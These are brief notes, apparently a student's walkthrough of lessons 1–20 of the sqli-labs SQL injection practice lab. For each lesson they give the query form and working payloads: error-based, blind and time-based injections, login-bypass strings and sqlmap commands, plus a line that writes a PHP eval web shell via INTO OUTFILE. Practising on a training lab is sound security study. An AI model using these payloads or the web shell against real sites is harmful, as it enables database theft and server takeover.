sqli-labs(Basic)

Less-1:

select * from table where id=‘1‘ limit 0,1;

Less-2:

select * from table where id=1 limit 0,1;

Less-3:

select * from table where id=(‘1‘) limit 0,1;

Less-4:

select * from table where id=("1") limit 0,1;

盲注:

Less-5:

select * from table where id=‘1‘ limit 0,1;

and extractvalue(1,concat(0x7e,(select version()),0x7e))%23
and updatexml(1,concat(0x7e,(select version()),0x7e),1)%23

Less-6:

select * from table where id="1" limit 0,1;

Less-7:

select * from table where id=((‘1‘)) limit 0,1;

and left(version(),1)=5%23
show variables like ‘%secure%‘;
my.ini>>secure_file_priv="/"
union select 1,2,<?php @eval($_POST["x"])?> into outfile *"path"%23

Less-8:

select * from table where id=‘1‘ limit 0,1;

基于时间盲注:

Less-9:

select * from table where id=‘1‘ limit 0,1;
and sleep(5)%23
and if(ascii(substr(database(),0,1))=115,0,sleep(5))%23

Less-10:

select * from table where id="1" limit 0,1;

POST:

Less-11:

select * from table where username=‘admin‘ and password=‘admin‘ limit 0,1;
admin‘ or ‘1‘=‘1#
1‘ union select 1,database()#
sqlmap --form

Less-12:

select * from table where username=("admin") and password=("admin") limit 0,1;
admin") or 1=1#
admin") or ("1")=("1#

盲注:

Less-13:

select * from table where username=(‘admin‘) and password=(‘admin‘) limit 0,1;
and extractvalue(1,concat(0x7e,(select version()),0x7e))#

Less-14:

select * from table where username="admin" and password="admin" limit 0,1;

Less15:(无法报错)

select * from table where username=‘admin‘ and password=‘admin‘ limit 0,1;

Less-16:

select * from table where username=("admin") and password=("admin") limit 0,1;

Less-17:(uname设置过滤)

update table set password=‘admin‘ where username=‘admin‘;
&passwd=admin‘and extractvalue(1,concat(0x7e,(select version()),0x7e))%23
sqlmap --data "uname=admin&passwd=admin&submit=Submit"

Less-18:

(uname,passwd设置过滤)
insert into table(a,b,c) values(‘user-agent‘,‘ip‘,‘uname‘);
‘and ‘1‘=‘1
‘and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and ‘1‘=‘1
sqlmap -r xx.txt --technique E

Less-19:

insert into table(a,b) values(‘referer‘,‘ip‘);
referer出注入

Less-20:

select * from table where user=‘cookie‘ limit 0,1;
cookie处注入

sqli-labs(Basic)

原文：https://www.cnblogs.com/f1veseven/p/13399119.html